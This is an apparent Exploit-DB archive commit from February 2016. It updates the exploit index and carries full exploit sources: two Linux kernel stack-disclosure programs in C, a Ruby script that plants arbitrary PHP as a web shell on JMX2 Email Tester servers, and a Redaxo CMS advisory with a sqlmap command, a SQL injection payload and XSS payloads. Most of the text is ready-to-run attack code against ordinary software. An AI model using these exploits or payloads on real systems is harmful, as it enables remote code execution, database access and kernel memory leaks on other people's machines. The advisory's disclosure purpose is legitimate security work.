DB: 2016-02-18

2 new exploits

files.csv

@@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port
 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0
 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0
-9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
+9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0
 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0
 9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0
@@ -8978,7 +8978,7 @@ id,file,description,date,author,platform,type,port
 9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0
 9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0
 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0
-9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
+9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0
 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0
 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
@@ -8986,7 +8986,7 @@ id,file,description,date,author,platform,type,port
 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
-9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
+9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
 9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
@@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
-15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
+15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0
@@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port
 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
 21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
-21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0
+21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
-21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
+21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0
 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
@@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port
 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
 32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
-32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
+32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
 32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
 32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0
@@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port
 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
 39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0
 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
+39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
+39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80

platforms/linux/local/9352.c

@@ -1,121 +1,121 @@
-/* 
+/* 
- * sigaltstack-leak.c
+ * sigaltstack-leak.c
- *
+ *
- * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
+ * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
- * Jon Oberheide <jon@oberheide.org>
+ * Jon Oberheide <jon@oberheide.org>
- * http://jon.oberheide.org
+ * http://jon.oberheide.org
- * 
+ * 
- * Information:
+ * Information:
- * 
+ * 
- *   http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
+ *   http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
- * 
+ * 
- *   Ulrich Drepper correctly points out that there is generally padding in
+ *   Ulrich Drepper correctly points out that there is generally padding in
- *   the structure on 64-bit hosts, and that copying the structure from
+ *   the structure on 64-bit hosts, and that copying the structure from
- *   kernel to user space can leak information from the kernel stack in those
+ *   kernel to user space can leak information from the kernel stack in those
- *   padding bytes.
+ *   padding bytes.
- * 
+ * 
- * Notes:
+ * Notes:
- * 
+ * 
- *   Only 4 bytes of uninitialized kernel stack are leaked in the padding 
+ *   Only 4 bytes of uninitialized kernel stack are leaked in the padding 
- *   between stack_t's ss_flags and ss_size.  The disclosure only affects 
+ *   between stack_t's ss_flags and ss_size.  The disclosure only affects 
- *   affects 64-bit hosts.
+ *   affects 64-bit hosts.
- */
+ */
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <stddef.h>
+#include <stddef.h>
-#include <stdlib.h>
+#include <stdlib.h>
-#include <string.h>
+#include <string.h>
-#include <signal.h>
+#include <signal.h>
-#include <unistd.h>
+#include <unistd.h>
-#include <time.h>
+#include <time.h>
-#include <sys/syscall.h>
+#include <sys/syscall.h>
-#include <sys/types.h>
+#include <sys/types.h>
-
+
-const int randcalls[] = {
+const int randcalls[] = {
-	0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16, 
+	0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16, 
-	21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73, 
+	21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73, 
-	78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108, 
+	78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108, 
-	109, 110, 11, 112, 113, 114, 116, 117, 118, 119, 
+	109, 110, 11, 112, 113, 114, 116, 117, 118, 119, 
-	120, 121, 121, 123, 124, 125, 140, 141, 143, 146
+	120, 121, 121, 123, 124, 125, 140, 141, 143, 146
-};
+};
-
+
-void
+void
-dump(const unsigned char *p, unsigned l)
+dump(const unsigned char *p, unsigned l)
-{
+{
-	printf("stack_t:");
+	printf("stack_t:");
-	while (l > 0) {
+	while (l > 0) {
-		printf(" ");
+		printf(" ");
-		if (l == 12) {
+		if (l == 12) {
-			printf("*** ");
+			printf("*** ");
-		}
+		}
-		printf("%02x", *p);
+		printf("%02x", *p);
-		if (l == 9) {
+		if (l == 9) {
-			printf(" ***");
+			printf(" ***");
-		}
+		}
-		++p; --l;
+		++p; --l;
-	}
+	}
-	printf("\n");
+	printf("\n");
-}
+}
-
+
-int
+int
-main(void)
+main(void)
-{
+{
-	char *p;
+	char *p;
-	int call, ret;
+	int call, ret;
-	size_t size, ftest, stest;
+	size_t size, ftest, stest;
-	stack_t oss;
+	stack_t oss;
-
+
-	size = sizeof(stack_t);
+	size = sizeof(stack_t);
-
+
-	printf("[+] Checking platform...\n");
+	printf("[+] Checking platform...\n");
-
+
-	if (size == 24) {
+	if (size == 24) {
-		printf("[+] sizeof(stack_t) = %zu\n", size);
+		printf("[+] sizeof(stack_t) = %zu\n", size);
-		printf("[+] Correct size, 64-bit platform.\n");
+		printf("[+] Correct size, 64-bit platform.\n");
-	} else {
+	} else {
-		printf("[-] sizeof(stack_t) = %zu\n", size);
+		printf("[-] sizeof(stack_t) = %zu\n", size);
-		printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
+		printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
-		printf("[-] No information disclosure is possible.\n");
+		printf("[-] No information disclosure is possible.\n");
-		exit(1);
+		exit(1);
-	}
+	}
-
+
-	ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
+	ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
-	stest = offsetof(stack_t, ss_size);
+	stest = offsetof(stack_t, ss_size);
-
+
-	printf("[+] Checking for stack_t hole...\n");
+	printf("[+] Checking for stack_t hole...\n");
-
+
-	if (ftest != stest) {
+	if (ftest != stest) {
-		printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
+		printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
-		printf("[+] Hole in stack_t present!\n", ftest, stest);
+		printf("[+] Hole in stack_t present!\n", ftest, stest);
-	} else {
+	} else {
-		printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
+		printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
-		printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
+		printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
-		exit(1);
+		exit(1);
-	}
+	}
-
+
-	printf("[+] Ready to call sigaltstack.\n\n");
+	printf("[+] Ready to call sigaltstack.\n\n");
-
+
-	for (ret = 5; ret > 0; ret--) {
+	for (ret = 5; ret > 0; ret--) {
-		printf("%d...\n", ret);
+		printf("%d...\n", ret);
-		sleep(1);
+		sleep(1);
-	}
+	}
-	srand(time(NULL));
+	srand(time(NULL));
-
+
-	while (1) {
+	while (1) {
-		/* random stuff to make stack pseudo-interesting */
+		/* random stuff to make stack pseudo-interesting */
-		call = rand() % (sizeof(randcalls) / sizeof(int));
+		call = rand() % (sizeof(randcalls) / sizeof(int));
-		syscall(randcalls[call]);
+		syscall(randcalls[call]);
-
+
-		ret = sigaltstack(NULL, &oss);
+		ret = sigaltstack(NULL, &oss);
-		if (ret != 0) {
+		if (ret != 0) {
-			printf("[-] Error: sigaltstack failed.\n");
+			printf("[-] Error: sigaltstack failed.\n");
-			exit(1);
+			exit(1);
-		}
+		}
-
+
-		dump((unsigned char *) &oss, sizeof(oss));
+		dump((unsigned char *) &oss, sizeof(oss));
-	}
+	}
-
+
-	return 0;
+	return 0;
-}
+}
-
+
-// milw0rm.com [2009-08-04]
+// milw0rm.com [2009-08-04]

platforms/linux/local/9513.c

@@ -1,146 +1,146 @@
-/* 
+/* 
- * llc-getsockname-leak.c
+ * llc-getsockname-leak.c
- *
+ *
- * Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
+ * Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
- * Jon Oberheide <jon@oberheide.org>
+ * Jon Oberheide <jon@oberheide.org>
- * http://jon.oberheide.org
+ * http://jon.oberheide.org
- * 
+ * 
- * Information:
+ * Information:
- * 
+ * 
- *   http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc 
+ *   http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc 
- *
+ *
- *   sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
+ *   sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
- *   before copying to the above layer's structure.
+ *   before copying to the above layer's structure.
- * 
+ * 
- * Notes:
+ * Notes:
- * 
+ * 
- *   Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
+ *   Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
- *   as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5 
+ *   as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5 
- *   bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
+ *   bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
- */
+ */
-
+
-#include <stdlib.h>
+#include <stdlib.h>
-#include <string.h>
+#include <string.h>
-#include <stdio.h>
+#include <stdio.h>
-#include <errno.h>
+#include <errno.h>
-#include <unistd.h>
+#include <unistd.h>
-#include <time.h>
+#include <time.h>
-#include <sys/types.h>
+#include <sys/types.h>
-#include <sys/socket.h>
+#include <sys/socket.h>
-#include <sys/syscall.h>
+#include <sys/syscall.h>
-#include <net/if_arp.h>
+#include <net/if_arp.h>
-
+
-#ifndef AF_LLC
+#ifndef AF_LLC
-#define AF_LLC 26
+#define AF_LLC 26
-#endif
+#endif
-
+
-#ifndef AF_LLC
+#ifndef AF_LLC
-#define AF_LLC 26
+#define AF_LLC 26
-#endif
+#endif
-
+
-#ifndef LLC_SAP_NULL
+#ifndef LLC_SAP_NULL
-#define LLC_SAP_NULL 0x00
+#define LLC_SAP_NULL 0x00
-#endif
+#endif
-
+
-#ifndef __LLC_SOCK_SIZE__
+#ifndef __LLC_SOCK_SIZE__
-#define __LLC_SOCK_SIZE__ 16
+#define __LLC_SOCK_SIZE__ 16
-struct sockaddr_llc {
+struct sockaddr_llc {
-	sa_family_t     sllc_family;
+	sa_family_t     sllc_family;
-	sa_family_t     sllc_arphrd;
+	sa_family_t     sllc_arphrd;
-	unsigned char   sllc_test;
+	unsigned char   sllc_test;
-	unsigned char   sllc_xid;
+	unsigned char   sllc_xid;
-	unsigned char   sllc_ua;
+	unsigned char   sllc_ua;
-	unsigned char   sllc_sap;
+	unsigned char   sllc_sap;
-	unsigned char   sllc_mac[6];
+	unsigned char   sllc_mac[6];
-	unsigned char   __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
+	unsigned char   __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
-	                      sizeof(unsigned char) * 4 - 6];
+	                      sizeof(unsigned char) * 4 - 6];
-};
+};
-#endif
+#endif
-
+
-const int randcalls[] = {
+const int randcalls[] = {
-	__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
+	__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
-	__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl, 
+	__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl, 
-	__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup, 
+	__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup, 
-	__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl, 
+	__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl, 
-	__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday, 
+	__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday, 
-	__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
+	__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
-	__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid, 
+	__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid, 
-	__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority, 
+	__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority, 
-	__NR_sched_getparam, __NR_sched_get_priority_max
+	__NR_sched_getparam, __NR_sched_get_priority_max
-};
+};
-
+
-void
+void
-dump(const unsigned char *p, unsigned l)
+dump(const unsigned char *p, unsigned l)
-{
+{
-	printf("sockaddr_llc:");
+	printf("sockaddr_llc:");
-	while (l > 0) {
+	while (l > 0) {
-		printf(" ");
+		printf(" ");
-		if (l == 12 || l == 2) {
+		if (l == 12 || l == 2) {
-			printf("*** ");
+			printf("*** ");
-		}
+		}
-		printf("%02x", *p);
+		printf("%02x", *p);
-		if (l == 10 || l == 1) {
+		if (l == 10 || l == 1) {
-			printf(" ***");
+			printf(" ***");
-		}
+		}
-		++p; --l;
+		++p; --l;
-	}
+	}
-	printf("\n");
+	printf("\n");
-}
+}
-
+
-int
+int
-main(void)
+main(void)
-{
+{
-	struct sockaddr_llc sllc;
+	struct sockaddr_llc sllc;
-	int ret, sock, call, sllc_len = sizeof(sllc);
+	int ret, sock, call, sllc_len = sizeof(sllc);
-	
+	
-	printf("[+] Creating AF_LLC socket.\n");
+	printf("[+] Creating AF_LLC socket.\n");
-
+
-	sock = socket(AF_LLC, SOCK_DGRAM, 0);
+	sock = socket(AF_LLC, SOCK_DGRAM, 0);
-	if (sock == -1) {
+	if (sock == -1) {
-		printf("[-] Error: Couldn't create AF_LLC socket.\n");
+		printf("[-] Error: Couldn't create AF_LLC socket.\n");
-		printf("[-] %s.\n", strerror(errno));
+		printf("[-] %s.\n", strerror(errno));
-		exit(1);
+		exit(1);
-	}
+	}
-
+
-	memset(&sllc, 0, sllc_len);
+	memset(&sllc, 0, sllc_len);
-
+
-	sllc.sllc_family = AF_LLC;
+	sllc.sllc_family = AF_LLC;
-	sllc.sllc_arphrd = ARPHRD_ETHER;
+	sllc.sllc_arphrd = ARPHRD_ETHER;
-	sllc.sllc_sap = LLC_SAP_NULL;
+	sllc.sllc_sap = LLC_SAP_NULL;
-	
+	
-	printf("[+] Dummy sendto to autobind socket.\n");
+	printf("[+] Dummy sendto to autobind socket.\n");
-
+
-	ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
+	ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
-	if (ret == -1) {
+	if (ret == -1) {
-		printf("[-] Error: sendto failed.\n");
+		printf("[-] Error: sendto failed.\n");
-		printf("[-] %s.\n", strerror(errno));
+		printf("[-] %s.\n", strerror(errno));
-		exit(1);
+		exit(1);
-	}
+	}
-
+
-	printf("[+] Ready to call getsockname.\n\n");
+	printf("[+] Ready to call getsockname.\n\n");
-
+
-	for (ret = 5; ret > 0; ret--) {
+	for (ret = 5; ret > 0; ret--) {
-		printf("%d...\n", ret);
+		printf("%d...\n", ret);
-		sleep(1);
+		sleep(1);
-	}
+	}
-	srand(time(NULL));
+	srand(time(NULL));
-
+
-	while (1) {
+	while (1) {
-		/* random stuff to make stack pseudo-interesting */
+		/* random stuff to make stack pseudo-interesting */
-		call = rand() % (sizeof(randcalls) / sizeof(int));
+		call = rand() % (sizeof(randcalls) / sizeof(int));
-		syscall(randcalls[call]);
+		syscall(randcalls[call]);
-
+
-		ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
+		ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
-		if (ret != 0) {
+		if (ret != 0) {
-			printf("[-] Error: getsockname failed.\n");
+			printf("[-] Error: getsockname failed.\n");
-			printf("[-] %s.\n", strerror(errno));
+			printf("[-] %s.\n", strerror(errno));
-			exit(1);
+			exit(1);
-		}
+		}
-
+
-		dump((unsigned char *) &sllc, sizeof(sllc));
+		dump((unsigned char *) &sllc, sizeof(sllc));
-	}
+	}
-
+
-	return 0;
+	return 0;
-}
+}
-
+
-// milw0rm.com [2009-08-25]
+// milw0rm.com [2009-08-25]

platforms/multiple/webapps/39456.rb

@@ -0,0 +1,45 @@
+# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
+# Date: 2016-02-15
+# Blog: http://www.hahwul.com
+# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
+# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
+# Tested on: debian [wheezy]
+# CVE : none
+
+require "net/http"
+require "uri"
+require 'uri-handler'
+
+if ARGV.length != 2
+
+puts "JMX2 Email Tester Web Shell Uploader"
+puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
+puts "  targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
+puts "  phpCode(ex): echo 'zzzzz'"
+puts "  Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
+puts "  Install GEM: #> gem install uri-handler"
+puts "  exploit & code by hahwul[www.hahwul.com]" 
+else
+target_url = ARGV[0]    # http://127.0.0.1/jmx2-Email-Tester/
+shell = ARGV[1]    # PHP Code
+shell = shell.to_uri
+exp_url = target_url + "/models/save_email.php"
+puts shell
+uri = URI.parse(exp_url)
+http = Net::HTTP.new(uri.host, uri.port)
+puts exp_url
+request = Net::HTTP::Post.new(uri.request_uri)
+request["Accept-Encoding"] = "gzip, deflate"
+request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
+request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
+request["Accept"] = "application/json, text/javascript, */*; q=0.01"
+request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
+request["Connection"] = "keep-alive"
+request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
+response = http.request(request)
+
+puts "[Result] Status code: "+response.code
+puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
+end
+
+

platforms/php/webapps/39459.txt

@@ -0,0 +1,70 @@
+=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-18 ===
+
+Redaxo CMS contains multiple vulnerabilities
+-------------------------------------------------------------
+
+Problem Overview
+================
+Technical Risk: high
+Likelihood of Exploitation: medium
+Vendor: https://www.redaxo.org/
+Tested version: Redaxo CMS v5.0.0
+Credits: LSE Leading Security Experts GmbH employee Tim Herres
+Advisory URL: https://www.lsexperts.de/advisories/lse-2016-01-18.txt
+Advisory Status: Public
+CVE-Number: na
+
+Impact
+======
+Redaxo is an easy to use open source content management system. A user can create his own website using the Redaxo CMS.
+During internal research, multiple vulnerabilities were identified in the Redaxo CMS software.
+The software is vulnerable to an SQL-Injection attack, allowing an authenticated user to access the database in an unsafe way.
+Some parts of the application do not have sufficient input validation and output encoding. This means user supplied input is inserted in an unsafe way
+resulting in a Cross Site Scripting vulnerability.
+
+Issue Description
+=================
+The following vulnerabilities are only examples. It is highly recommended to check the whole application for similar vulnerabilities.
+1) SQL Injection in the "Mediapool" component:
+Authentication required: yes
+User needs access to the "Mediapool".
+
+POC:
+Exploitation using SQL Map
+sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name
+
+Parameter: media_name (GET)
+Type: stacked queries
+Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
+Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined=
+
+2) Reflected XSS
+Authentication required: yes
+Used browser: FF42
+Example:
+https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.<script>alert("xss");</script>&opener_input_field=
+
+3) Stored XSS (persistent XSS)
+Authentication required: yes
+Used browser: FF42
+It is possible to store JavaScript Code in input fields.
+Example:
+Menu --> "Mediapool" --> "Media Category Managing" --> Add --> Name field
+Payload:<script>alert("xss")</script>
+Response:
+[...]
+[...]href="index.php?page=mediapool/structure&cat_id=801"><script>alert("xss");</script></a></li></ol></div><section class="rex-page-sectio
+[...]
+
+
+Temporary Workaround and Fix
+============================
+Update to Version 5.0.1
+
+History
+=======
+2016-01-18  Issues discovered
+2016-01-29  Vendor contacted
+2016-02-05  Vendor confirmed
+2016-02-09  Vendor released patch
+2016-02-16  Advisory released